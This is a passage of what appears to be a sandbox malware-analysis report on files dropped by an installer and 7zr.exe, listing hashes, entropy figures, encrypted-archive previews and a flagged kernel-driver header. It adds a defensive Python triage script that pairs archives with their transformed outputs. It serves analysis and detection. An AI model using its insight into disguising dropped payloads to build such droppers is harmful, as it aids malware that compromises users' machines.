                                        Encrypted:true
                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56562
                                        Entropy (8bit):7.996582801995233
                                        Encrypted:true
                                        SSDEEP:1536:3F0eJo4+8uBWHKxbKOjr9BhmraXVJ9twDJ0y2Q6XqT5l:36ezuBWHiMaXKmLQ6XqNl
                                        MD5:E769F3D07898BEF062E8B54B4106F3EC
                                        SHA1:F5B22B500440E3CDB0DE8FDCF358315F3F189733
                                        SHA-256:209FEBE4F67AB02005B86988E23CAE0F04BB9792EEE20A022377662BFE27756A
                                        SHA-512:9A3455BD08A5F8CC5996192298B68E9681876080FC2B95F90954143D0931B10B10C3D5590CA5CE78BAD295D9C9B9A6B9FF00E5DEE429D6712C78C28F0B9E6C12
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56562
                                        Entropy (8bit):7.996582801995233
                                        Encrypted:true
                                        SSDEEP:1536:QjaZEp/McY1uLZ39pjWJjrYs7vYCM2nXyfJzc3n+7xrM:eaZZ89rjCj3vrXyfJzc3E2
                                        MD5:19706ECE8EF8BE5854CEF996036FD25D
                                        SHA1:5D6DACF970F731A8629627DB5F5F276541BB5AFA
                                        SHA-256:04D815A3E4CEB9925032A39AB6239F7B95ED761A957483A64373FDCC25913247
                                        SHA-512:6912573C4411CA4EE6044FAA3FA5E7381BDB3285808090FAA80E8F35499439778619DD36A4F2D3DF9589DA0AF52926CCBAD6691AF366F031B6CA31B4B65E5A16
                                        Malicious:false
                                        Preview:7z..'..............2........R.p....]..M............6.s...............Q.'F5#B],...8$..i.<..L.>.........uq.4......}.}.`...V......E$Nb]...m.v.{../.\..."..Yh.D.....X......r..{.p.............(L~.h4....@.*.7I..h..[...DO.h....U...h.%7.&.l.^W.V.: .D.......j...Wv..^...0(.B..C.W9.$a../.u)...hD...s.qRb..i......n4. .Jc}.E.8.+..m.s.....U.d....p...P.-_MqCn......h.MO.`)..x...46_.;.`...-hmA.O.%....N..^..L..!.........H.t.B.....&*R..f.Y...".J...9.G...qd47..k.....$.[g...O.......S.9Ai.j.`+..x..ig.`9.....F].$......tw.W.o0G..g.8..+..[.|*..z......i.../V(.=...]!.h.K......X.......K.J..C....=9aSD.Y.,.....7}A.$D..2.....Ac.....L.i...KC...{4J[.(g>......2h0.RW.<..89~@.Uy.m.[/..Nw..0wD....,+.z...U.j...e.';..M...N....r..ff......S.@..cLE.0.W.....,.F3...5.(W.N.....z~.L...G.b.u)@L)Ua..!....tI.].^..b.Pe..<v]9..l.y.......".E^....}.W...9....q..r*.c..fNR..},?..U..n..........Z.y..m.:......5..Ey....f.WP..)..jv{..ESi.*...CK..@j.k..p./..{.@.2..0..a.y.32.K.......9.%l....K..sQ.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255975
                                        Encrypted:true
                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                        Malicious:false
                                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255979
                                        Encrypted:true
                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                        Malicious:false
                                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                        Malicious:false
                                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                        Malicious:false
                                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.99759370165655
                                        Encrypted:true
                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                        Malicious:false
                                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.997593701656546
                                        Encrypted:true
                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                        Malicious:false
                                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653607
                                        Encrypted:true
                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                        Malicious:false
                                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653608
                                        Encrypted:true
                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                        Malicious:false
                                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):250000
                                        Entropy (8bit):7.999233217470124
                                        Encrypted:true
                                        SSDEEP:6144:1CV1oCvUxznH9Oxyyt42fnM+KhFtVbiOO:AV1o4Wzn9l2/HonbiP
                                        MD5:8ABFBD435E4C97ADECC98054531BDB10
                                        SHA1:45EE0AE577F885C664C7CBB9465DC3F5602D52DC
                                        SHA-256:2D6F169B3A86F7A5167C882D6AC0C600C4BDB50751D63873F77673EB01C6FB0F
                                        SHA-512:EB62FA8CF7B481EC94368A4329E599FFE891DF489F8D3DB51B1A6CA5637BBD3C397ACD3FE6025732315A072ABE7059CFB97A7E20DB31991C80C5F63F83918C18
                                        Malicious:false
                                        Preview:7z..'......0.......@........m.m.A..8..!K.`.GQ.........F..`:*!.Q..i..3..+..W..$.-....z.G.[4E.T.h.z!.k2.3.CMY1>....!y..>...i..zBb...K..$...i..{...@....}8.3^.J..u...7..R.a]..(aiRWE.P..ib<...X.0...o.v.lY...l.]_.7........C....{.r.1...Zf.)2fN-"HO.Z.0....s...kjO!.....I.-Hg...:7..k.kl...a..!....=...D.........yk..i...x..H..O.W..a..t..-m..B. ..z..G.~.P..e.dN......U.y.....7....R..~..h..*01i.Bty...q.Y+.8I..N.Q....w..^....u.._..D......2.....-.....M..w.u.[.>WzW.s....U.......%....>...8-...6.p..: .=P..cH..:UA.^.<.....P..@.^t..T.;.W&.Y....Q...@8P...4t...cr.zN....8.R)..m..:I..".7...r..o0:0.......@1.8..L#...l.%^.a21....L.c4.wc........_....a...".o...ge.#.`.{-.+.@o.....r,j..h<.!;......F.}....J..!..V..b..z....&!/.l.1...l.......rh..2.....8...v..Ie...mP.T..1D..TZs..Q.lc....&.b.[.7...A.)J.[..Z......q..n...r...n..........o....F.....0t...!.7.....Vj.._....a...r`.$..#11...^..{.4.]...]..+.......Q....,.}....'l..-.Ee.\n]....3..;]0.!.i.6fj.......e...R......$....qT
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):63640
                                        Entropy (8bit):6.482810107683822
                                        Encrypted:false
                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 9%
                                        • Antivirus: Virustotal, Detection: 4%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
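Two things in the records above are worth a second look before trusting the per-file "Malicious:false" verdicts. First, every "data" file written by C:\Program Files (x86)\Windows NT\7zr.exe has exactly the size and, to 15 digits, the 8-bit entropy of one 7-Zip archive dropped by the Inno Setup .tmp (56562, 56546, 31890, 74960 and 29730 bytes), while its first bytes (".@S") no longer carry the 7z signature. Shannon entropy depends only on the byte histogram, so equal size plus equal entropy means the two files almost certainly have the same histogram; that is what a byte-wise bijection (a substitution table or a single-byte XOR) produces, and not what decompression produces, which would change the size. Second, the native-subsystem PE written by 7zr.exe (with an INIT section, i.e. a driver) is the one file here flagged malicious. The Python below is an added triage example, not code from the report or from the sample: it parses the report's own Key:Value record layout, pairs each 7zr.exe output with its same-size archive, and shows the entropy invariance on a constructed blob. The excerpt of records, the function names and the 7.9 entropy threshold are this example's own assumptions.

```python
import math
from collections import Counter

SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"  # the "7z..'" at the start of each archive preview
APPLOCKER_PROBE = "# PowerShell test file to determine AppLocker lockdown mode"

# Constructed excerpt in the report's own "Key:Value" layout; sizes, entropies and
# MD5s are copied from records on this page. Field subset and order are assumptions.
SAMPLE_RECORDS = r"""Process:C:\Program Files (x86)\Windows NT\7zr.exe
File Type:data
Size (bytes):56546
Entropy (8bit):7.996966859255975
MD5:CEA69F993E1CE0FB945A98BF37A66546
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
File Type:7-zip archive data, version 0.4
Size (bytes):56546
Entropy (8bit):7.996966859255979
MD5:4CB8B7E557C80FC7B014133AB834A042
Malicious:false
Process:C:\Program Files (x86)\Windows NT\7zr.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Size (bytes):63640
Entropy (8bit):6.482810107683822
MD5:B4EAACCE30F51EAF2A36CEA680B45A66
Malicious:true
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
Entropy (8bit):4.038920595031593
MD5:D17FE0A3F47BE24A6453E9EF58C94641
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""


def parse_records(text):
    """Split the excerpt into dicts; a new record starts at every Process: line."""
    records = []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key == "Process":
            records.append({})
        if records and key:
            records[-1][key] = value
    return records


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the report's Entropy (8bit) measure."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_byte_bijection_candidate(a, b):
    """Same length and same sorted histogram: what equal size + equal entropy implies."""
    return len(a) == len(b) and sorted(Counter(a).values()) == sorted(Counter(b).values())


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def pair_archives_with_7zr_output(records, tol=1e-9):
    """Match each 'data' file written by 7zr.exe with an archive of identical size
    and (within float noise) identical entropy; returns (archive MD5, output MD5, size)."""
    archives = [r for r in records if r.get("File Type", "").startswith("7-zip archive")]
    pairs = []
    for r in records:
        if r.get("File Type") != "data" or not r.get("Process", "").lower().endswith("7zr.exe"):
            continue
        for a in archives:
            same_size = a["Size (bytes)"] == r["Size (bytes)"]
            same_entropy = abs(float(a["Entropy (8bit)"]) - float(r["Entropy (8bit)"])) < tol
            if same_size and same_entropy:
                pairs.append((a["MD5"], r["MD5"], int(r["Size (bytes)"])))
    return pairs


def triage(record):
    """One-line analyst verdict per record, independent of the report's Malicious flag."""
    proc = record.get("Process", "").lower()
    ftype = record.get("File Type", "")
    if record.get("Preview", "") == APPLOCKER_PROBE:
        return "PowerShell startup artefact (AppLocker/WDAC policy probe); proves PowerShell ran, not what it ran"
    if "executable (native)" in ftype:
        return "kernel driver written by " + proc.rsplit("\\", 1)[-1] + "; check signer and driver load events"
    if ftype == "data" and proc.endswith("7zr.exe") and float(record["Entropy (8bit)"]) > 7.9:
        return "high-entropy blob written by 7zr.exe; pair it with an archive of equal size"
    return "no rule matched"


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        print(r["MD5"], "->", triage(r))
    print(pair_archives_with_7zr_output(recs))
    blob = SEVEN_ZIP_MAGIC + bytes(range(256)) * 4          # constructed stand-in for an archive
    print(is_byte_bijection_candidate(blob, xor_bytes(blob, 0x5A)))
```

The pairing check is the cheap part; confirming the transform requires the two files themselves (compare the two histograms byte-value by byte-value to recover a substitution table, or XOR the first six bytes of the output against the 7z signature to test for a single-byte key).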
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4096
                                        Entropy (8bit):3.344834847024567
                                        Encrypted:false
